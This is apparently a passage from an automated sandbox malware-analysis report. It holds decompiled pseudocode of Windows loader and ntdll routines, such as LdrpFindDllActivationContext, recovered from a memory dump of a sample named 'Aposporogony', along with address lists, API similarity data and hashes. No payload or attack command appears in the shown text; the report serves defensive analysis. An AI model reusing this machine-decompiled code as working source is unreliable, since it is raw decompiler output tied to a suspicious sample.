                                                                                                                                                                                      											 *((intOrPtr*)(_t141 - 0x1c)) = 0xc0000004;
                                                                                                                                                                                      											L28:
                                                                                                                                                                                      											_t139 =  *((intOrPtr*)(_t141 - 0x20));
                                                                                                                                                                                      											L29:
                                                                                                                                                                                      											_push(_t141 - 0x24);
                                                                                                                                                                                      											_push( *((intOrPtr*)(_t141 - 0x24)));
                                                                                                                                                                                      											_push(_t139);
                                                                                                                                                                                      											_t136 =  *((intOrPtr*)( *(_t141 - 0x38) + 0x1d81189c));
                                                                                                                                                                                      											continue;
                                                                                                                                                                                      										}
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										_t132 = 0xc0000229;
                                                                                                                                                                                      										L32:
                                                                                                                                                                                      										 *((intOrPtr*)(_t141 - 0x1c)) = _t132;
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      								goto L33;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							goto L31;
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      					L33:
                                                                                                                                                                                      					 *(_t141 - 4) = 0xfffffffe;
                                                                                                                                                                                      					E1D8BEE16();
                                                                                                                                                                                      					_t84 =  *(_t141 - 0x2c) + 1;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t141 - 0x10));
                                                                                                                                                                                      				return _t132;
                                                                                                                                                                                      			}


















                                                                                                                                                                                      0x1d8bebd0
                                                                                                                                                                                      0x1d8bebd0
                                                                                                                                                                                      0x1d8bebd2
                                                                                                                                                                                      0x1d8bebd7
                                                                                                                                                                                      0x1d8bebdc
                                                                                                                                                                                      0x1d8bebdf
                                                                                                                                                                                      0x1d8bebe1
                                                                                                                                                                                      0x1d8bebe6
                                                                                                                                                                                      0x1d8bebe7
                                                                                                                                                                                      0x1d8bebea
                                                                                                                                                                                      0x1d8bebee
                                                                                                                                                                                      0x1d8bebf5
                                                                                                                                                                                      0x1d8bebff
                                                                                                                                                                                      0x1d8bec0a
                                                                                                                                                                                      0x1d8bec0f
                                                                                                                                                                                      0x1d8bec12
                                                                                                                                                                                      0x1d8bec01
                                                                                                                                                                                      0x1d8bec01
                                                                                                                                                                                      0x1d8bec06
                                                                                                                                                                                      0x1d8bec06
                                                                                                                                                                                      0x1d8bec14
                                                                                                                                                                                      0x1d8bec17
                                                                                                                                                                                      0x1d8bec1c
                                                                                                                                                                                      0x1d8bec23
                                                                                                                                                                                      0x1d8bec26
                                                                                                                                                                                      0x1d8bec26
                                                                                                                                                                                      0x1d8bec29
                                                                                                                                                                                      0x1d8bec2c
                                                                                                                                                                                      0x1d8bec2e
                                                                                                                                                                                      0x1d8bec31
                                                                                                                                                                                      0x1d8bec31
                                                                                                                                                                                      0x1d8bec37
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8bec3d
                                                                                                                                                                                      0x1d8bec44
                                                                                                                                                                                      0x1d8bec4d
                                                                                                                                                                                      0x1d8bec4f
                                                                                                                                                                                      0x1d8bec4f
                                                                                                                                                                                      0x1d8bec54
                                                                                                                                                                                      0x1d8bec59
                                                                                                                                                                                      0x1d8bec61
                                                                                                                                                                                      0x1d8bec67
                                                                                                                                                                                      0x1d8bec69
                                                                                                                                                                                      0x1d8bec69
                                                                                                                                                                                      0x1d8bec6c
                                                                                                                                                                                      0x1d8bec70
                                                                                                                                                                                      0x1d8bec73
                                                                                                                                                                                      0x1d8bec81
                                                                                                                                                                                      0x1d8bec81
                                                                                                                                                                                      0x1d8bec87
                                                                                                                                                                                      0x1d8bec89
                                                                                                                                                                                      0x1d8bec8f
                                                                                                                                                                                      0x1d8bec93
                                                                                                                                                                                      0x1d8bedf0
                                                                                                                                                                                      0x1d8bedf0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8bec99
                                                                                                                                                                                      0x1d8bec9d
                                                                                                                                                                                      0x1d8beca6
                                                                                                                                                                                      0x1d8beca7
                                                                                                                                                                                      0x1d8becaa
                                                                                                                                                                                      0x1d8becb0
                                                                                                                                                                                      0x1d8bedde
                                                                                                                                                                                      0x1d8bedde
                                                                                                                                                                                      0x1d8bede0
                                                                                                                                                                                      0x1d8bede6
                                                                                                                                                                                      0x1d8bedea
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8becc1
                                                                                                                                                                                      0x1d8becc7
                                                                                                                                                                                      0x1d8beccc
                                                                                                                                                                                      0x1d8becd8
                                                                                                                                                                                      0x1d8becd9
                                                                                                                                                                                      0x1d8becdc
                                                                                                                                                                                      0x1d8bece9
                                                                                                                                                                                      0x1d8beceb
                                                                                                                                                                                      0x1d8becf1
                                                                                                                                                                                      0x1d8becf4
                                                                                                                                                                                      0x1d8becfa
                                                                                                                                                                                      0x1d8bed0e
                                                                                                                                                                                      0x1d8bed24
                                                                                                                                                                                      0x1d8bed2a
                                                                                                                                                                                      0x1d8bed2c
                                                                                                                                                                                      0x1d8bed32
                                                                                                                                                                                      0x1d8bed36
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8bed3c
                                                                                                                                                                                      0x1d8bed3c
                                                                                                                                                                                      0x1d8bed41
                                                                                                                                                                                      0x1d8bedc4
                                                                                                                                                                                      0x1d8bedc7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8bed43
                                                                                                                                                                                      0x1d8bed49
                                                                                                                                                                                      0x1d8bed4c
                                                                                                                                                                                      0x1d8bed4f
                                                                                                                                                                                      0x1d8bed51
                                                                                                                                                                                      0x1d8bed58
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8bed5e
                                                                                                                                                                                      0x1d8bed61
                                                                                                                                                                                      0x1d8bed64
                                                                                                                                                                                      0x1d8bed70
                                                                                                                                                                                      0x1d8bed73
                                                                                                                                                                                      0x1d8bed75
                                                                                                                                                                                      0x1d8bed7c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8bed7e
                                                                                                                                                                                      0x1d8bed8a
                                                                                                                                                                                      0x1d8bed8d
                                                                                                                                                                                      0x1d8bed8f
                                                                                                                                                                                      0x1d8bed96
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8bed98
                                                                                                                                                                                      0x1d8beda4
                                                                                                                                                                                      0x1d8beda7
                                                                                                                                                                                      0x1d8beda9
                                                                                                                                                                                      0x1d8bedb0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8bedb2
                                                                                                                                                                                      0x1d8bedb2
                                                                                                                                                                                      0x1d8bedb8
                                                                                                                                                                                      0x1d8bedbd
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8bedbd
                                                                                                                                                                                      0x1d8bedb0
                                                                                                                                                                                      0x1d8bed96
                                                                                                                                                                                      0x1d8bed7c
                                                                                                                                                                                      0x1d8bed58
                                                                                                                                                                                      0x1d8bed41
                                                                                                                                                                                      0x1d8becfc
                                                                                                                                                                                      0x1d8becfc
                                                                                                                                                                                      0x1d8bed01
                                                                                                                                                                                      0x1d8bedca
                                                                                                                                                                                      0x1d8bedca
                                                                                                                                                                                      0x1d8bedcd
                                                                                                                                                                                      0x1d8bedd0
                                                                                                                                                                                      0x1d8bedd1
                                                                                                                                                                                      0x1d8bedd4
                                                                                                                                                                                      0x1d8bedd8
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8bedd8
                                                                                                                                                                                      0x1d8becce
                                                                                                                                                                                      0x1d8becce
                                                                                                                                                                                      0x1d8bedf2
                                                                                                                                                                                      0x1d8bedf2
                                                                                                                                                                                      0x1d8bedf2
                                                                                                                                                                                      0x1d8beccc
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8becc1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8bedde
                                                                                                                                                                                      0x1d8bec9d
                                                                                                                                                                                      0x1d8bedf5
                                                                                                                                                                                      0x1d8bedf5
                                                                                                                                                                                      0x1d8bedfc
                                                                                                                                                                                      0x1d8bee04
                                                                                                                                                                                      0x1d8bee04
                                                                                                                                                                                      0x1d8bee47
                                                                                                                                                                                      0x1d8bee53

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                                                      • Opcode ID: db8897eaf73571b5ebbd3ec33ab7605ca67d65cf5c10ed8a8dac0805a923ff9a
                                                                                                                                                                                      • Instruction ID: 2920d37cbd4fd05dcdcf62565a63d22d1bc6f942d242108577f2967a4da45ac1
                                                                                                                                                                                      • Opcode Fuzzy Hash: db8897eaf73571b5ebbd3ec33ab7605ca67d65cf5c10ed8a8dac0805a923ff9a
                                                                                                                                                                                      • Instruction Fuzzy Hash: B0712775E002299FDF06CFA8C884AEDBBB5BF48310F158029E905EB390D775A905CF95
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                                                      • Opcode ID: 0aa40fa35ff2fe6a9087c0e455f625b041710397d33b3fff8263223ff9695980
                                                                                                                                                                                      • Instruction ID: 4603fcb07af269422d3d766986fa7af5d85a19e8484922fd00ea85cdfae54610
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0aa40fa35ff2fe6a9087c0e455f625b041710397d33b3fff8263223ff9695980
                                                                                                                                                                                      • Instruction Fuzzy Hash: 38518F3470461B9FDB0ACE58C890A2A77F5FF8A720B10406DD50ADB710DB79EC42CB82
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                                                      • Opcode ID: 958a4e4b8d354d2c9021575ebf4b92042b1921188d895abdb0a91c9fbffe8bdc
                                                                                                                                                                                      • Instruction ID: c4ffba3df3624d28fb2bfc5b7232737576ca04fac794bc438a17f708bf08ef66
                                                                                                                                                                                      • Opcode Fuzzy Hash: 958a4e4b8d354d2c9021575ebf4b92042b1921188d895abdb0a91c9fbffe8bdc
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D511276E002189FDF09CFA9D880ADDBBB5BF48310F05812AE805BB3A0D736A905CF51
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 25%
                                                                                                                                                                                      			E1D877A4F(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                      				signed int _t34;
                                                                                                                                                                                      				signed int _t35;
                                                                                                                                                                                      				signed int _t40;
                                                                                                                                                                                      				intOrPtr _t42;
                                                                                                                                                                                      				void* _t50;
                                                                                                                                                                                      				intOrPtr* _t55;
                                                                                                                                                                                      				intOrPtr* _t69;
                                                                                                                                                                                      				void* _t73;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t63 = __edx;
                                                                                                                                                                                      				_t51 = __ebx;
                                                                                                                                                                                      				_push(0x30);
                                                                                                                                                                                      				_push(0x1d91c840);
                                                                                                                                                                                      				E1D897BE4(__ebx, __edi, __esi);
                                                                                                                                                                                      				_t66 = __ecx;
                                                                                                                                                                                      				 *(_t73 - 4) =  *(_t73 - 4) & 0x00000000;
                                                                                                                                                                                      				_t69 =  *0x1d935a7c;
                                                                                                                                                                                      				_push(__edx);
                                                                                                                                                                                      				if(_t69 == 0) {
                                                                                                                                                                                      					 *0x1d9391e0();
                                                                                                                                                                                      					E1D87B490(__ecx, __edx,  *__ecx());
                                                                                                                                                                                      					_t55 =  *((intOrPtr*)(_t73 - 0x14));
                                                                                                                                                                                      					 *((intOrPtr*)(_t73 - 0x40)) =  *((intOrPtr*)( *_t55));
                                                                                                                                                                                      					 *((intOrPtr*)(_t73 - 0x24)) = _t55;
                                                                                                                                                                                      					_t34 =  *0x1d935d38; // 0x44e074c2
                                                                                                                                                                                      					 *(_t73 - 0x30) = _t34;
                                                                                                                                                                                      					__eflags =  *0x1d9365fc; // 0x3b89a524
                                                                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                      						_push(4);
                                                                                                                                                                                      						_push(_t73 - 0x2c);
                                                                                                                                                                                      						_push(0x24);
                                                                                                                                                                                      						_push(0xffffffff);
                                                                                                                                                                                      						 *(_t73 - 0x1c) = E1D882B20();
                                                                                                                                                                                      						__eflags =  *(_t73 - 0x1c);
                                                                                                                                                                                      						if( *(_t73 - 0x1c) < 0) {
                                                                                                                                                                                      							E1D898AA0(_t55, _t63,  *(_t73 - 0x1c));
                                                                                                                                                                                      						}
                                                                                                                                                                                      						 *0x1d9365fc =  *(_t73 - 0x2c);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t35 =  *0x1d9365fc; // 0x3b89a524
                                                                                                                                                                                      					 *(_t73 - 0x20) = _t35;
                                                                                                                                                                                      					_push(0x20);
                                                                                                                                                                                      					asm("ror eax, cl");
                                                                                                                                                                                      					 *(_t73 - 0x34) =  *(_t73 - 0x30);
                                                                                                                                                                                      					_t40 =  *(_t73 - 0x34) ^  *(_t73 - 0x20);
                                                                                                                                                                                      					__eflags = _t40;
                                                                                                                                                                                      					 *(_t73 - 0x38) = _t40;
                                                                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                                                                      						_push(0x1d8150b4);
                                                                                                                                                                                      						_push( *((intOrPtr*)(_t73 - 0x24)));
                                                                                                                                                                                      						 *((intOrPtr*)(_t73 - 0x3c)) = L1D8F8890(_t51, _t63, _t66, 0, __eflags);
                                                                                                                                                                                      						_t42 =  *((intOrPtr*)(_t73 - 0x3c));
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						 *0x1d9391e0( *((intOrPtr*)(_t73 - 0x24)));
                                                                                                                                                                                      						_t42 =  *( *(_t73 - 0x38))();
                                                                                                                                                                                      					}
                                                                                                                                                                                      					 *((intOrPtr*)(_t73 - 0x28)) = _t42;
                                                                                                                                                                                      					return  *((intOrPtr*)(_t73 - 0x28));
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					 *0x1d9391e0();
                                                                                                                                                                                      					_t50 =  *_t69();
                                                                                                                                                                                      					 *(_t73 - 4) = 0xfffffffe;
                                                                                                                                                                                      					 *[fs:0x0] =  *((intOrPtr*)(_t73 - 0x10));
                                                                                                                                                                                      					return _t50;
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}











                                                                                                                                                                                      0x1d877a4f
                                                                                                                                                                                      0x1d877a4f
                                                                                                                                                                                      0x1d877a4f
                                                                                                                                                                                      0x1d877a51
                                                                                                                                                                                      0x1d877a56
                                                                                                                                                                                      0x1d877a5b
                                                                                                                                                                                      0x1d877a5d
                                                                                                                                                                                      0x1d877a61
                                                                                                                                                                                      0x1d877a67
                                                                                                                                                                                      0x1d877a6a
                                                                                                                                                                                      0x1d8b47f8
                                                                                                                                                                                      0x1d8b4801
                                                                                                                                                                                      0x1d8b4806
                                                                                                                                                                                      0x1d8b480d
                                                                                                                                                                                      0x1d8b4810
                                                                                                                                                                                      0x1d8b4813
                                                                                                                                                                                      0x1d8b4818
                                                                                                                                                                                      0x1d8b481d
                                                                                                                                                                                      0x1d8b4823
                                                                                                                                                                                      0x1d8b4825
                                                                                                                                                                                      0x1d8b4826
                                                                                                                                                                                      0x1d8b482b
                                                                                                                                                                                      0x1d8b482c
                                                                                                                                                                                      0x1d8b482e
                                                                                                                                                                                      0x1d8b4835
                                                                                                                                                                                      0x1d8b4838
                                                                                                                                                                                      0x1d8b483b
                                                                                                                                                                                      0x1d8b4840
                                                                                                                                                                                      0x1d8b4840
                                                                                                                                                                                      0x1d8b4848
                                                                                                                                                                                      0x1d8b4848
                                                                                                                                                                                      0x1d8b484d
                                                                                                                                                                                      0x1d8b4852
                                                                                                                                                                                      0x1d8b485b
                                                                                                                                                                                      0x1d8b4863
                                                                                                                                                                                      0x1d8b4865
                                                                                                                                                                                      0x1d8b486b
                                                                                                                                                                                      0x1d8b486b
                                                                                                                                                                                      0x1d8b486e
                                                                                                                                                                                      0x1d8b4871
                                                                                                                                                                                      0x1d8b4885
                                                                                                                                                                                      0x1d8b488a
                                                                                                                                                                                      0x1d8b4892
                                                                                                                                                                                      0x1d8b4895
                                                                                                                                                                                      0x1d8b4873
                                                                                                                                                                                      0x1d8b487b
                                                                                                                                                                                      0x1d8b4881
                                                                                                                                                                                      0x1d8b4881
                                                                                                                                                                                      0x1d8b4898
                                                                                                                                                                                      0x1d8b489e
                                                                                                                                                                                      0x1d877a70
                                                                                                                                                                                      0x1d877a72
                                                                                                                                                                                      0x1d877a7c
                                                                                                                                                                                      0x1d8b48ac
                                                                                                                                                                                      0x1d8b48b6
                                                                                                                                                                                      0x1d8b48c2
                                                                                                                                                                                      0x1d8b48c2

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4281723722-0
                                                                                                                                                                                      • Opcode ID: a529122096fab2a179061012f75345f5ee540bedbd59d85f287c6b866358c15f
                                                                                                                                                                                      • Instruction ID: 9e357f92fec53aa0b3dea5cb1fa94dace89bdf1b55fa0564ccaafee9ff34e042
                                                                                                                                                                                      • Opcode Fuzzy Hash: a529122096fab2a179061012f75345f5ee540bedbd59d85f287c6b866358c15f
                                                                                                                                                                                      • Instruction Fuzzy Hash: F0312279E04668EFCF05DFACD885A9DBBB1EB48320F11412AE510B7391C7346900CF91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 50%
                                                                                                                                                                                      			E1D874B79(intOrPtr* __ecx, signed int __edx) {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				signed int _v60;
                                                                                                                                                                                      				intOrPtr _v64;
                                                                                                                                                                                      				intOrPtr _v68;
                                                                                                                                                                                      				signed int _v72;
                                                                                                                                                                                      				intOrPtr _v76;
                                                                                                                                                                                      				signed int _v84;
                                                                                                                                                                                      				signed int _v88;
                                                                                                                                                                                      				char _v92;
                                                                                                                                                                                      				signed int _v96;
                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                      				signed int _t82;
                                                                                                                                                                                      				signed int _t86;
                                                                                                                                                                                      				signed int _t89;
                                                                                                                                                                                      				intOrPtr* _t97;
                                                                                                                                                                                      				signed int _t99;
                                                                                                                                                                                      				void* _t102;
                                                                                                                                                                                      				void* _t104;
                                                                                                                                                                                      				signed int _t111;
                                                                                                                                                                                      				intOrPtr* _t112;
                                                                                                                                                                                      				intOrPtr* _t113;
                                                                                                                                                                                      				signed int _t114;
                                                                                                                                                                                      				void* _t115;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t107 = __edx;
                                                                                                                                                                                      				_t72 =  *0x1d93b370 ^ _t114;
                                                                                                                                                                                      				_v8 =  *0x1d93b370 ^ _t114;
                                                                                                                                                                                      				_t110 = __ecx;
                                                                                                                                                                                      				_v96 = __edx;
                                                                                                                                                                                      				_t99 = __edx;
                                                                                                                                                                                      				if(__edx == 0 || ( *(__edx + 8) & 0x00000004) != 0) {
                                                                                                                                                                                      					L12:
                                                                                                                                                                                      					return E1D884B50(_t72, _t97, _v8 ^ _t114, _t107, _t110, _t111);
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					_t110 = __ecx + 4;
                                                                                                                                                                                      					_t97 =  *_t110;
                                                                                                                                                                                      					while(_t97 != _t110) {
                                                                                                                                                                                      						_t111 = _t97 - 8;
                                                                                                                                                                                      						_t107 = 1;
                                                                                                                                                                                      						if( *_t111 != 0x74736c46) {
                                                                                                                                                                                      							_v84 = _v84 & 0x00000000;
                                                                                                                                                                                      							_push( &_v92);
                                                                                                                                                                                      							_v76 = 4;
                                                                                                                                                                                      							_v72 = 1;
                                                                                                                                                                                      							_v68 = 1;
                                                                                                                                                                                      							_v64 = _t110;
                                                                                                                                                                                      							_v60 = _t111;
                                                                                                                                                                                      							_v92 = 0xc0150015;
                                                                                                                                                                                      							_v88 = 1;
                                                                                                                                                                                      							E1D898A60(_t99, 1);
                                                                                                                                                                                      							_t99 = _v96;
                                                                                                                                                                                      							_t107 = 1;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						if( *(_t111 + 0x14) !=  !( *(_t111 + 4))) {
                                                                                                                                                                                      							_v84 = _v84 & 0x00000000;
                                                                                                                                                                                      							_push( &_v92);
                                                                                                                                                                                      							_v76 = 4;
                                                                                                                                                                                      							_v72 = _t107;
                                                                                                                                                                                      							_v68 = 2;
                                                                                                                                                                                      							_v64 = _t110;
                                                                                                                                                                                      							_v60 = _t111;
                                                                                                                                                                                      							_v92 = 0xc0150015;
                                                                                                                                                                                      							_v88 = _t107;
                                                                                                                                                                                      							E1D898A60(_t99, _t107);
                                                                                                                                                                                      							_t99 = _v96;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t72 = _t111 + 0x18;
                                                                                                                                                                                      						if(_t99 < _t111 + 0x18) {
                                                                                                                                                                                      							L13:
                                                                                                                                                                                      							_t97 =  *_t97;
                                                                                                                                                                                      							continue;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							_t72 = _t111 + 0x618;
                                                                                                                                                                                      							if(_t99 >= _t111 + 0x618) {
                                                                                                                                                                                      								goto L13;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_v96 = 0x30;
                                                                                                                                                                                      								_t82 = _t99 - _t111 - 0x18;
                                                                                                                                                                                      								asm("cdq");
                                                                                                                                                                                      								_t107 = _t82 % _v96;
                                                                                                                                                                                      								_t72 = 0x18 + _t82 / _v96 * 0x30 + _t111;
                                                                                                                                                                                      								if(_t99 == 0x18 + _t82 / _v96 * 0x30 + _t111) {
                                                                                                                                                                                      									_t72 =  *(_t111 + 4);
                                                                                                                                                                                      									if(_t72 != 0) {
                                                                                                                                                                                      										_t86 = _t72 - 1;
                                                                                                                                                                                      										 *(_t111 + 4) = _t86;
                                                                                                                                                                                      										_t72 =  !_t86;
                                                                                                                                                                                      										 *(_t111 + 0x14) =  !_t86;
                                                                                                                                                                                      										 *((intOrPtr*)(_t99 + 8)) = 4;
                                                                                                                                                                                      										if( *(_t111 + 4) == 0) {
                                                                                                                                                                                      											_t72 =  *(_t97 + 4);
                                                                                                                                                                                      											if(_t72 != _t110) {
                                                                                                                                                                                      												do {
                                                                                                                                                                                      													_t111 =  *(_t72 + 4);
                                                                                                                                                                                      													_t56 = _t72 - 8; // -4
                                                                                                                                                                                      													_t107 = _t56;
                                                                                                                                                                                      													if( *((intOrPtr*)(_t107 + 4)) != 0) {
                                                                                                                                                                                      														goto L33;
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														_t102 =  *_t72;
                                                                                                                                                                                      														if( *(_t102 + 4) != _t72 ||  *_t111 != _t72) {
                                                                                                                                                                                      															_push(3);
                                                                                                                                                                                      															asm("int 0x29");
                                                                                                                                                                                      															_t104 = 0x3f;
                                                                                                                                                                                      															if( *((intOrPtr*)(_t72 + 2)) == _t104 &&  *(_t72 + 4) == _t104 &&  *((intOrPtr*)(_t72 + 6)) == _t111 &&  *(_t72 + 8) != _t97 &&  *((short*)(_t72 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t72 + 0xc)) == _t111) {
                                                                                                                                                                                      																_t72 = _t72 + 8;
                                                                                                                                                                                      															}
                                                                                                                                                                                      															_t112 =  *0x1d9365e4; // 0x7726f0e0
                                                                                                                                                                                      															 *0x1d9391e0(_t107, _t72,  &_v8);
                                                                                                                                                                                      															_t113 =  *_t112();
                                                                                                                                                                                      															if(_t113 >= 0) {
                                                                                                                                                                                      																L18:
                                                                                                                                                                                      																_t89 = _v8;
                                                                                                                                                                                      																if(_t89 != 0) {
                                                                                                                                                                                      																	if( *(_t110 + 0x48) != _t97) {
                                                                                                                                                                                      																		E1D8426A0(_t89,  *(_t110 + 0x48));
                                                                                                                                                                                      																		_t89 = _v8;
                                                                                                                                                                                      																	}
                                                                                                                                                                                      																	 *(_t110 + 0x48) = _t89;
                                                                                                                                                                                      																}
                                                                                                                                                                                      																if(_t113 < 0) {
                                                                                                                                                                                      																	if(( *0x1d9337c0 & 0x00000003) != 0) {
                                                                                                                                                                                      																		E1D8BE692("minkernel\\ntdll\\ldrsnap.c", 0x2eb, "LdrpFindDllActivationContext", _t97, "Querying the active activation context failed with status 0x%08lx\n", _t113);
                                                                                                                                                                                      																	}
                                                                                                                                                                                      																	if(( *0x1d9337c0 & 0x00000010) != 0) {
                                                                                                                                                                                      																		asm("int3");
                                                                                                                                                                                      																	}
                                                                                                                                                                                      																}
                                                                                                                                                                                      																return _t113;
                                                                                                                                                                                      															} else {
                                                                                                                                                                                      																if(_t113 != 0xc000008a) {
                                                                                                                                                                                      																	if(_t113 == 0xc000008b || _t113 == 0xc0000089 || _t113 == 0xc000000f || _t113 == 0xc0000204 || _t113 == 0xc0000002) {
                                                                                                                                                                                      																		goto L16;
                                                                                                                                                                                      																	} else {
                                                                                                                                                                                      																		if(_t113 != 0xc00000bb) {
                                                                                                                                                                                      																			goto L18;
                                                                                                                                                                                      																		} else {
                                                                                                                                                                                      																			goto L16;
                                                                                                                                                                                      																		}
                                                                                                                                                                                      																	}
                                                                                                                                                                                      																	goto L53;
                                                                                                                                                                                      																} else {
                                                                                                                                                                                      																	L16:
                                                                                                                                                                                      																	if(( *0x1d9337c0 & 0x00000005) != 0) {
                                                                                                                                                                                      																		_push(_t113);
                                                                                                                                                                                      																		_t67 = _t110 + 0x24; // 0x123
                                                                                                                                                                                      																		E1D8BE692("minkernel\\ntdll\\ldrsnap.c", 0x2ce, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t67);
                                                                                                                                                                                      																		_t115 = _t115 + 0x1c;
                                                                                                                                                                                      																	}
                                                                                                                                                                                      																	_t113 = _t97;
                                                                                                                                                                                      																}
                                                                                                                                                                                      																goto L18;
                                                                                                                                                                                      															}
                                                                                                                                                                                      														} else {
                                                                                                                                                                                      															 *_t111 = _t102;
                                                                                                                                                                                      															 *(_t102 + 4) = _t111;
                                                                                                                                                                                      															E1D853BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t107);
                                                                                                                                                                                      															goto L33;
                                                                                                                                                                                      														}
                                                                                                                                                                                      													}
                                                                                                                                                                                      													goto L53;
                                                                                                                                                                                      													L33:
                                                                                                                                                                                      													_t72 = _t111;
                                                                                                                                                                                      												} while (_t111 != _t110);
                                                                                                                                                                                      											}
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      								goto L12;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      						goto L53;
                                                                                                                                                                                      					}
